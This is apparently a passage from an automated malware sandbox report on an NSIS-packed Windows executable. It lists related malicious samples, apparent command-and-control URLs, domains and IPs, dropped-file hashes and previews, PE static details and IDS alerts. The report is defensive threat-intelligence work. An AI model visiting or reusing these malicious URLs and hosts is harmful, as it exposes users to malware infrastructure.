                                                                        • www.kinfet.com/evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu
                                                                        AQJEKNHnWK.exeGet hashmaliciousBrowse
                                                                        • www.gracieleesgiftsandmore.com/hx3a/?tZUT=3J4IwxDxyQGM57lngVTovpY0RYYybvKdXCCorOYcpgj/2IXBVenraHtymYKqlnAzAiYz&9r98J=FbY8OBD
                                                                        payment.exeGet hashmaliciousBrowse
                                                                        • www.moxa-pro.com/bei3/?Rl=M48tiJch&M4YDYvh=y7EZsd/VU66W5EPJYwX5Xfv+3DSZx1f1d6WAR6GRDy2o8Omo0ZsYhDvN6jXI6rbTZYPD
                                                                        Order.exeGet hashmaliciousBrowse
                                                                        • www.woofytees.com/cugi/?BlL=guBtZ9/BZLKg3V3RSdvXg/8z1FJ37mZkFho76YC6dYQSBoV8kgYAqcCQ9vWS/DgnoPIa&EZXpx6=tXExBh8PdJwpH
                                                                        PO91361.exeGet hashmaliciousBrowse
                                                                        • www.thegreenbattle.com/sb9r/?j2JhErl=WUvo38J/IHQ2cZDNQTpzQUKmli8iSC3X7FmX7RGR1rjI+erccOscsvK8+mo5h+9Qwsc2&NXf8l=AvBHWhTxsnkxJjj0
                                                                        RFQ11_ZIM2021pdf.exeGet hashmaliciousBrowse
                                                                        • www.yourdadsamug.com/hmog/?U48Hj=FlcsoMQcYP8bHmq4bYup7jQaOgohKV4/DEyixY4WMPM8LbmuXu036xGPxLAWg/kNnOBQ&wP9=ndsh-n6
                                                                        1517679127365.exeGet hashmaliciousBrowse
                                                                        • www.dollfaceextensionsllc.net/ct6a/?YP=fbdhu8lXTJZTH&LhN0T=92RjyhAwLwjL7yI7dz7K3gLd4uBg10QtxWOWXnGeU67JXFS1m9O45cTA73iQHOIfF2a9
                                                                        W88AZXFGH.exeGet hashmaliciousBrowse
                                                                        • www.oouuweee.com/klf/?VPXl=btTL_&ojPl=MYGgbBKqv4+u3e/kdP2Xd91vi4RM/aoA3smYuNxu5fW82Y1Oa+7PC+KK+eq77k+PBZt4nUhikw==
                                                                        OC CVE9362 _TVOP-MIO 2(C) 2021,pdf.exeGet hashmaliciousBrowse
                                                                        • www.shopvivreluxe.com/smzu/?IB=XIQ4zU3AjC42PFCTOO37iro6/VjVaWUNsZ/SuojON2epSeHv79IyId/eqrs49S5DR7zK&ndlpdH=xPJtZdZP

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        www.jabberjawmobile.comPayment advice IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                                                                        • 104.21.37.16
                                                                        www.formula-kuhni.comAQJEKNHnWK.exeGet hashmaliciousBrowse
                                                                        • 91.236.136.12
                                                                        www.xn--ol-xia.comcV1uaQeOGg.exeGet hashmaliciousBrowse
                                                                        • 81.17.18.196
                                                                        newordermx.exeGet hashmaliciousBrowse
                                                                        • 81.17.18.198
                                                                        www.tonton-koubou.comcV1uaQeOGg.exeGet hashmaliciousBrowse
                                                                        • 163.44.185.226
                                                                        AQJEKNHnWK.exeGet hashmaliciousBrowse
                                                                        • 163.44.185.226
                                                                        www.yakudatsu-hikaku.comcV1uaQeOGg.exeGet hashmaliciousBrowse
                                                                        • 118.27.95.215
                                                                        shops.myshopify.comPAYMENT COPY.exeGet hashmaliciousBrowse
                                                                        • 23.227.38.74
                                                                        Payment advice IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                                                                        • 23.227.38.74
                                                                        winlog.exeGet hashmaliciousBrowse
                                                                        • 23.227.38.74
                                                                        36ne6xnkop.exeGet hashmaliciousBrowse
                                                                        • 23.227.38.74
                                                                        Pd0Tb0v0WW.exeGet hashmaliciousBrowse
                                                                        • 23.227.38.74
                                                                        giATspz5dw.exeGet hashmaliciousBrowse
                                                                        • 23.227.38.74
                                                                        cV1uaQeOGg.exeGet hashmaliciousBrowse
                                                                        • 23.227.38.74
                                                                        CNTR-NO-GLDU7267089.xlsxGet hashmaliciousBrowse
                                                                        • 23.227.38.74
                                                                        IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                                                                        • 23.227.38.74
                                                                        HG546092227865431209.exeGet hashmaliciousBrowse
                                                                        • 23.227.38.74
                                                                        Ref. PDF IGAPO17493.exeGet hashmaliciousBrowse
                                                                        • 23.227.38.74
                                                                        pumYguna1i.exeGet hashmaliciousBrowse
                                                                        • 23.227.38.74
                                                                        0BAdCQQVtP.exeGet hashmaliciousBrowse
                                                                        • 23.227.38.74
                                                                        TazxfJHRhq.exeGet hashmaliciousBrowse
                                                                        • 23.227.38.74
                                                                        AQJEKNHnWK.exeGet hashmaliciousBrowse
                                                                        • 23.227.38.74
                                                                        New Order.exeGet hashmaliciousBrowse
                                                                        • 23.227.38.74
                                                                        payment.exeGet hashmaliciousBrowse
                                                                        • 23.227.38.74
                                                                        BL836477488575.exeGet hashmaliciousBrowse
                                                                        • 23.227.38.74
                                                                        Order.exeGet hashmaliciousBrowse
                                                                        • 23.227.38.74
                                                                        PO.exeGet hashmaliciousBrowse
                                                                        • 23.227.38.74

                                                                        ASN

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        CLOUDFLARENETUSieuHgdpuPo.exeGet hashmaliciousBrowse
                                                                        • 104.21.17.57
                                                                        Cobro Juridico_0420198202_326828_4985792583130360_300690_8122300886764676459_5190713730838_pdf.exeGet hashmaliciousBrowse
                                                                        • 172.67.222.176
                                                                        Payment Slip.docGet hashmaliciousBrowse
                                                                        • 104.21.17.57
                                                                        Cobro Juridico_0291662728_7023446_452487041454723_016698_5192136884256735776_2301761820735_pdf.exeGet hashmaliciousBrowse
                                                                        • 104.21.17.57
                                                                        INQUIRY 1820521 pdf.exeGet hashmaliciousBrowse
                                                                        • 104.21.82.58
                                                                        PaymentCopy.vbsGet hashmaliciousBrowse
                                                                        • 172.67.222.131
                                                                        PAYMENT COPY.exeGet hashmaliciousBrowse
                                                                        • 104.21.28.135
                                                                        PO NUMBER 3120386 3120393 SIGNED.exeGet hashmaliciousBrowse
                                                                        • 1.2.3.4
                                                                        Cobro Juridico_07223243630_5643594_539661009070075_49874359_5059639084170590400_7272781644_pdf.exeGet hashmaliciousBrowse
                                                                        • 172.67.222.176
                                                                        BL2659618800638119374.xls.exeGet hashmaliciousBrowse
                                                                        • 172.67.222.176
                                                                        Purchase order and quote confirmation.exeGet hashmaliciousBrowse
                                                                        • 172.67.222.176
                                                                        Confirm Order for SK TRIMS & INDUSTRIES_DK4571,pdf.exeGet hashmaliciousBrowse
                                                                        • 172.67.188.154
                                                                        Re Confirm#U00ffthe invoice#U00ffthe payment slip.exeGet hashmaliciousBrowse
                                                                        • 104.21.17.57
                                                                        SOA.exeGet hashmaliciousBrowse
                                                                        • 104.21.19.200
                                                                        RFQ No A'4762GHTECHNICAL DETAILS.exeGet hashmaliciousBrowse
                                                                        • 104.21.19.200
                                                                        GQ5JvPEI6c.exeGet hashmaliciousBrowse
                                                                        • 104.21.17.57
                                                                        setupapp.exeGet hashmaliciousBrowse
                                                                        • 172.67.164.1
                                                                        g2qwgG2xbe.exeGet hashmaliciousBrowse
                                                                        • 172.67.161.4
                                                                        C++ Dropper.exeGet hashmaliciousBrowse
                                                                        • 104.21.50.92
                                                                        12042021493876783,xlsx.exeGet hashmaliciousBrowse
                                                                        • 23.227.38.65
                                                                        INTERQGMOInternetIncJPg2qwgG2xbe.exeGet hashmaliciousBrowse
                                                                        • 163.44.239.73
                                                                        36ne6xnkop.exeGet hashmaliciousBrowse
                                                                        • 163.44.239.73
                                                                        1ucvVfbHnD.exeGet hashmaliciousBrowse
                                                                        • 163.44.239.73
                                                                        cV1uaQeOGg.exeGet hashmaliciousBrowse
                                                                        • 163.44.185.226
                                                                        Customer-100912288113.xlsxGet hashmaliciousBrowse
                                                                        • 163.44.239.73
                                                                        LWlcpDjYIQ.exeGet hashmaliciousBrowse
                                                                        • 118.27.122.19
                                                                        pumYguna1i.exeGet hashmaliciousBrowse
                                                                        • 163.44.239.73
                                                                        AQJEKNHnWK.exeGet hashmaliciousBrowse
                                                                        • 163.44.185.226
                                                                        PRC-20-518 ORIGINAL.xlsxGet hashmaliciousBrowse
                                                                        • 150.95.52.74
                                                                        DYANAMIC Inquiry.xlsxGet hashmaliciousBrowse
                                                                        • 163.44.239.73
                                                                        pvUopSIi7C5Eklw.exeGet hashmaliciousBrowse
                                                                        • 163.44.239.72
                                                                        BL-2010403L.exeGet hashmaliciousBrowse
                                                                        • 118.27.99.27
                                                                        INV-210318L.exeGet hashmaliciousBrowse
                                                                        • 118.27.99.27
                                                                        g0g865fQ2S.exeGet hashmaliciousBrowse
                                                                        • 163.44.239.73
                                                                        oQJT5eueEX.exeGet hashmaliciousBrowse
                                                                        • 150.95.255.38
                                                                        Invoice.xlsxGet hashmaliciousBrowse
                                                                        • 150.95.255.38
                                                                        MACHINE SPECIFICATION.exeGet hashmaliciousBrowse
                                                                        • 118.27.99.20
                                                                        4xMdbgzeJQ.exeGet hashmaliciousBrowse
                                                                        • 150.95.255.38
                                                                        Q1VDYnqeBX.exeGet hashmaliciousBrowse
                                                                        • 163.44.239.73
                                                                        products order pdf.exeGet hashmaliciousBrowse
                                                                        • 163.44.239.73
                                                                        WEBHOST1-ASRUAQJEKNHnWK.exeGet hashmaliciousBrowse
                                                                        • 91.236.136.12
                                                                        i9EG6zNNQf.exeGet hashmaliciousBrowse
                                                                        • 45.138.157.212
                                                                        zfeISnMIsM.exeGet hashmaliciousBrowse
                                                                        • 45.153.231.219
                                                                        0y5uGFovqp.exeGet hashmaliciousBrowse
                                                                        • 45.153.231.219
                                                                        bid,12.17.2020.docGet hashmaliciousBrowse
                                                                        • 193.201.126.102
                                                                        bid,12.17.2020.docGet hashmaliciousBrowse
                                                                        • 193.201.126.102
                                                                        bid,12.17.2020.docGet hashmaliciousBrowse
                                                                        • 193.201.126.102
                                                                        specifics,12.16.2020.docGet hashmaliciousBrowse
                                                                        • 193.201.126.102
                                                                        specifics,12.16.2020.docGet hashmaliciousBrowse
                                                                        • 193.201.126.102
                                                                        specifics,12.16.2020.docGet hashmaliciousBrowse
                                                                        • 193.201.126.102
                                                                        certificate-12.16.2020.docGet hashmaliciousBrowse
                                                                        • 193.201.126.114
                                                                        certificate-12.16.2020.docGet hashmaliciousBrowse
                                                                        • 193.201.126.114
                                                                        certificate-12.16.2020.docGet hashmaliciousBrowse
                                                                        • 193.201.126.114
                                                                        enjoin 12.16.20.docGet hashmaliciousBrowse
                                                                        • 193.201.126.93
                                                                        enjoin 12.16.20.docGet hashmaliciousBrowse
                                                                        • 193.201.126.93
                                                                        enjoin 12.16.20.docGet hashmaliciousBrowse
                                                                        • 193.201.126.93
                                                                        index.htaGet hashmaliciousBrowse
                                                                        • 193.201.126.34
                                                                        http://phfvg141cruel.com/analytics/LSQwD5t2BeUGnP/G8_qFgBBGbZjcd8JDXL8c8GstBjE4NUfsHd/zzfp3?hHhX=DHLSFDKlZVUUrAz&ZZnZZ=IeACrr_VRiWdZf_&IEVY=TTWUhlBkEBZi&rKHt=qiYWQbrbKzGGet hashmaliciousBrowse
                                                                        • 193.201.126.34
                                                                        legislate-12.20.docGet hashmaliciousBrowse
                                                                        • 193.201.126.34
                                                                        legislate-12.20.docGet hashmaliciousBrowse
                                                                        • 193.201.126.34
                                                                        GMO-REG-NETGMOInternetIncJPcV1uaQeOGg.exeGet hashmaliciousBrowse
                                                                        • 118.27.95.215

                                                                        JA3 Fingerprints

                                                                        No context

                                                                        Dropped Files

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        C:\Users\user\AppData\Local\Temp\nsv773C.tmp\m9c3uhgbfqo.dllPayment advice IN18663Q0031139I.xlsxGet hashmaliciousBrowse

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\Local\Temp\dxcetsy85d610a164hb
                                                                          Process:C:\Users\user\Desktop\4oItdZkNOZ.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):164864
                                                                          Entropy (8bit):7.9989537199070995
                                                                          Encrypted:true
                                                                          SSDEEP:3072:eCYqJ+rFV8CkMMTx5jRABnPOs9fsZJ9POz9v9qB0kN3Wtlyf7TB2o8bXqysuN:j0V8CvM7lSPOs90Zuz9QDN3OloB8TB
                                                                          MD5:66F630975828C988D10147947A6066FC
                                                                          SHA1:9F3BE969B7AACE3B0A9D6CE76C33C6BF3B94801E
                                                                          SHA-256:5AF320BE1022A920E036C4218414C439DF65F9100CB772CBCDE715CCB5353C19
                                                                          SHA-512:0E4B4A5346286B43D4C6A890843210B55E323AE1D05D5378A6FA73B7AA81D26153529DD32436D3F92FD6789BA8398F423EF05CDF69D3B5B9F5A5B1CF531A7F1B
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview: ?.....c...8T..P).....}a.=.....kO3^W....;...{<i...j..,....8..p..b8[M.P..H.]X.i_3...|kR7.<.Y..L.r..tph@#yp.<WK.._.u$..b.....E..,~"2N.(..j...o...t.4h.....m...n.R..a..,...58....u3Tu|I....X...B...c....Ez.....Q|..xHU6."<.....7ZZ.|.bM.....B.k.H....n...Pf4...$.7.5.Y..r*//q.\..p...%hT..*^..G...>..3.qm.j....Cd....X...u...\ux..qcg.H..,.+G..0v.....BV.....y.F,.....`@6.sC.Z.N=X.....>^..Z.\Q.|...q}..#.@...a......"..k...kA......,Y..UXXDr...@Wl..N.,..+..x...p....X..$&:.e.o?..X..q .x..#..g..1..6.e...-.......WGf....9..%.}.A... R.....>..b...v...$..v{5^%..^\..l|.O.$.J.}.._q~p..c.u....mU...@X..EVu..a.g9n..........."/....7P.j.d;i2d[...z"......k.R.Yl.}IhR#uR..][o;}.E...{.i....M..U...4s.KJE.n|.......j........o.Y.Ug".H&.&uw....)G....z..._...b.....^:D.}fw.p$.].$. <.)...X...k........5R.&.t._.....f..=iT" .....J..N..H.............q.g.d.w9[.3.....l.....=t...QS..........d4..pm.H.....@.h.<.=..o..7.p..N>x.f./....TC..l..2F..6.^..xRw=..jg..M..Bs'9.)._.*......Z...-<..V>X
                                                                          C:\Users\user\AppData\Local\Temp\eh2api3cxcp4
                                                                          Process:C:\Users\user\Desktop\4oItdZkNOZ.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):6661
                                                                          Entropy (8bit):7.95283900519363
                                                                          Encrypted:false
                                                                          SSDEEP:96:3a5irTx9nq7Pa8uVcysMEG8aCTrAK40vPUojz3NfsX2qhmOe77wN6EB:3a5M9nqT/uidzacvPUojz9tvDPwN6EB
                                                                          MD5:97F97CF558ABBDF02D80BD9BE6E6E007
                                                                          SHA1:A02112C110F988A0C2567A3E1732CD8AAC8863F7
                                                                          SHA-256:535934F5D314EED051264A6D1D24542B551E0A1AD738FECF7A26E18B7520419D
                                                                          SHA-512:29CD3852A2F4A64D055BAE82E7A1F036C98BC684190CED8A8EE3F396BE8F626E5B7ABA15B6F60F185842F938A0B086F203273530A9C74945FA1DC100105E0FA6
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview: ).`qH..G#Yl..M........rpg.u....`^B."4D....2....:...%..<.P...........,.;...6K....UR#...I......lb. ...t.V.X.[l.&{...Q..I<}T..gctW..0..w2..(....h/..J...}M..&o.s...oG.C..].c...{Y.l..$.......Xk..;U;V.5..=..B.c1...i.].%.R.],..~.ET}ne.....Tw.W.-......sW......t...M..3...C,vfV.rMu..bBx.k...@O.q..FT..?......;..`.A!{A].v.l.Os.v.....7).tC.q ..>.../.XI...^YO.!................(%TB gs..Z..A...~J.j.6\2yE...8..q.[c.x..\!.I3..c.hk....q..5.S.`..qCz.....8.....%.s...d.\f....-..y..o:.....'.`.Tw...8.j..#<<.X...8...1j.^.........X......'....1...@.y^s..}...9...*R."^.C......6...a...u...Gq%]......-...+w...=..w...].........BI.=~[%..).#G.X....>....?....J.?5^.o8...P.Ii.$2...D..M.hv.1..`S..u.....=...m.I..Z..?........ xI.h.!Z...ETQ.K........>r...........*J...1#.Z.1.,0.A.9$.0.2.'...Q..dp..H..k......jR.Y.R2".~...J..+..u1@...r...~t...f..s>....Y6..j.2.o...+...8fehK~w....?.Z.'J..T8..D.9.Xv...........J....1.8.H.O.!.+.}.g......N.l.}..]....q....W.T.....p./..2..d.!..R...d.y.[
                                                                          C:\Users\user\AppData\Local\Temp\nsv773C.tmp\m9c3uhgbfqo.dll
                                                                          Process:C:\Users\user\Desktop\4oItdZkNOZ.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):5632
                                                                          Entropy (8bit):4.079886237854097
                                                                          Encrypted:false
                                                                          SSDEEP:48:a97y2RN2yedcWZhfChEsHIGmEsH/Gt4BKiZ/seNkTHfav6yYZmEeSRuqS:1Eidj4IGN4/GCBKxfQKuix
                                                                          MD5:0FE614493EC9FBF1C2A1D80C94BD82E4
                                                                          SHA1:3090FD37896D3A4D2FA8AA6EE6536BFA415C5253
                                                                          SHA-256:29943F203F544CD1F2B51396E1B371B017B705A3D43FF16E3A8FCC7350E629D9
                                                                          SHA-512:07360B40C2D2FF6E7CD1FC0D6E78D60E62677607C0C85FA62705EEA1F53A8844B1E51CD5E91E7ECED53F601FFEBC30A6A9002CA1EB62F68613D38C9DE9D5A0EC
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 10%
                                                                          Joe Sandbox View:
                                                                          • Filename: Payment advice IN18663Q0031139I.xlsx, Detection: malicious, Browse
                                                                          Reputation:low
                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........5K..fK..fK..f_..gZ..fK..fw..f...gJ..f...gJ..f..{fJ..f...gJ..fRichK..f........................PE..L...T.s`...........!......................... ...............................`............@.........................@ ..P....1.......@.......................P...... ...............................................0...............................code...!........................... ....data...l.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                          Entropy (8bit):7.020348156679716
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                          • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:4oItdZkNOZ.exe
                                                                          File size:394513
                                                                          MD5:36cf33e57ccccf3754b57ab14e623e57
                                                                          SHA1:f54422966fd1e5f8180f618a51c938372d3711be
                                                                          SHA256:9914c8ad9ea0318f57214c6eb2f2e3f891b71ba054a9de071432ec92eb6bfe0d
                                                                          SHA512:4eb8e5e6d3a24853496318816f038d987571e6f8fbf1b6308e0539f679a89baa85f548dd465a346ae6772ae68164edb0fe2d660c8eef70a880b8f0235724372e
                                                                          SSDEEP:6144:bd5+vAz3kwJcM25Py5Dniq2GMo0V8CvM7lSPOs90Zuz9QDN3OloB8Te:ivAz3kwJB0OBSDiYWDdOmCe
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.H............,...........:...!........&......e.......Rich....................PE..L.....8E.................Z....<.....J1.....

                                                                          File Icon

                                                                          Icon Hash:c4c0c4dc9ccc6eb4

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x40314a
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                          DLL Characteristics:
                                                                          Time Stamp:0x4538CD0B [Fri Oct 20 13:20:11 2006 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:18bc6fa81e19f21156316b1ae696ed6b

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          sub esp, 0000017Ch
                                                                          push ebx
                                                                          push ebp
                                                                          push esi
                                                                          xor esi, esi
                                                                          push edi
                                                                          mov dword ptr [esp+18h], esi
                                                                          mov ebp, 00409240h
                                                                          mov byte ptr [esp+10h], 00000020h
                                                                          call dword ptr [00407030h]
                                                                          push esi
                                                                          call dword ptr [00407270h]
                                                                          mov dword ptr [007A3030h], eax
                                                                          push esi
                                                                          lea eax, dword ptr [esp+30h]
                                                                          push 00000160h
                                                                          push eax
                                                                          push esi
                                                                          push 0079E540h
                                                                          call dword ptr [00407158h]
                                                                          push 00409230h
                                                                          push 007A2780h
                                                                          call 00007F819CA242C8h
                                                                          mov ebx, 007AA400h
                                                                          push ebx
                                                                          push 00000400h
                                                                          call dword ptr [004070B4h]
                                                                          call 00007F819CA21A09h
                                                                          test eax, eax
                                                                          jne 00007F819CA21AC6h
                                                                          push 000003FBh
                                                                          push ebx
                                                                          call dword ptr [004070B0h]
                                                                          push 00409228h
                                                                          push ebx
                                                                          call 00007F819CA242B3h
                                                                          call 00007F819CA219E9h
                                                                          test eax, eax
                                                                          je 00007F819CA21BE2h
                                                                          mov edi, 007A9000h
                                                                          push edi
                                                                          call dword ptr [00407140h]
                                                                          call dword ptr [004070ACh]
                                                                          push eax
                                                                          push edi
                                                                          call 00007F819CA24271h
                                                                          push 00000000h
                                                                          call dword ptr [00407108h]
                                                                          cmp byte ptr [007A9000h], 00000022h
                                                                          mov dword ptr [007A2F80h], eax
                                                                          mov eax, edi
                                                                          jne 00007F819CA21AACh
                                                                          mov byte ptr [esp+10h], 00000022h
                                                                          mov eax, 00000001h

                                                                          Rich Headers

                                                                          Programming Language:
                                                                          • [EXP] VC++ 6.0 SP5 build 8804

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x73440xb4.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x3ac0000x2e40f.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x70000x280.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x10000x59de0x5a00False0.681293402778data6.5143386598IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                          .rdata0x70000x10f20x1200False0.430338541667data5.0554281206IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .data0x90000x39a0340x400unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                          .ndata0x3a40000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .rsrc0x3ac0000x2e40f0x2e600False0.319470181941data5.38627533233IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountry
                                                                          RT_ICON0x3ac3100x6454PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                          RT_ICON0x3b27640x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                                          RT_ICON0x3c2f8c0x94a8data
                                                                          RT_ICON0x3cc4340x5488data
                                                                          RT_ICON0x3d18bc0x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 254, next used block 1056964608
                                                                          RT_ICON0x3d5ae40x25a8data
                                                                          RT_ICON0x3d808c0x10a8data
                                                                          RT_ICON0x3d91340x988data
                                                                          RT_ICON0x3d9abc0x468GLS_BINARY_LSB_FIRST
                                                                          RT_DIALOG0x3d9f240x100dataEnglishUnited States
                                                                          RT_DIALOG0x3da0240x11cdataEnglishUnited States
                                                                          RT_DIALOG0x3da1400x60dataEnglishUnited States
                                                                          RT_GROUP_ICON0x3da1a00x84data
                                                                          RT_MANIFEST0x3da2240x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                          Imports

                                                                          DLLImport
                                                                          KERNEL32.dllCloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
                                                                          USER32.dllScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                          GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                          SHELL32.dllSHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                          ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                          COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                          ole32.dllOleInitialize, OleUninitialize, CoCreateInstance
                                                                          VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                          Possible Origin

                                                                          Language of compilation systemCountry where language is spokenMap
                                                                          EnglishUnited States

                                                                          Network Behavior

                                                                          Snort IDS Alerts

                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                          04/12/21-10:02:21.841809ICMP384ICMP PING192.168.2.613.107.4.50
                                                                          04/12/21-10:02:21.876757ICMP449ICMP Time-To-Live Exceeded in Transit84.17.52.126192.168.2.6
                                                                          04/12/21-10:02:21.879024ICMP384ICMP PING192.168.2.613.107.4.50
                                                                          04/12/21-10:02:21.913930ICMP449ICMP Time-To-Live Exceeded in Transit5.56.20.161192.168.2.6
                                                                          04/12/21-10:02:21.914433ICMP384ICMP PING192.168.2.613.107.4.50
                                                                          04/12/21-10:02:21.949945ICMP449ICMP Time-To-Live Exceeded in Transit91.206.52.152192.168.2.6
                                                                          04/12/21-10:02:21.950838ICMP384ICMP PING192.168.2.613.107.4.50
                                                                          04/12/21-10:02:25.466097ICMP384ICMP PING192.168.2.613.107.4.50
                                                                          04/12/21-10:02:29.466391ICMP384ICMP PING192.168.2.613.107.4.50
                                                                          04/12/21-10:02:33.469421ICMP384ICMP PING192.168.2.613.107.4.50
                                                                          04/12/21-10:02:37.467082ICMP384ICMP PING192.168.2.613.107.4.50
